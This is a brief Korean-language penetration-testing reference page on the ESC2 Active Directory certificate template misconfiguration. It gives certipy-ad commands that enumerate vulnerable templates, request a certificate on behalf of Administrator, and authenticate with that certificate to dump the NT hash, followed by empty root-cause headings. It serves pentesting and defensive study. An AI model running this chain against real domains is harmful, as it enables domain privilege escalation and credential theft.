ESC2
속성
값
Abuse
# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled
# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template '<template-name>'
# 발급한 인증서를 통해 Administrator의 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template 'User' -pfx '<pfx>' -on-behalf-of '<domain\Administrator>'
# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'Root Cause
Enrollment Rights

Requires Manager Approval & Authorized Signatures Required

Any Purpose / EKU

Include this information in alternate subject name

References
Last updated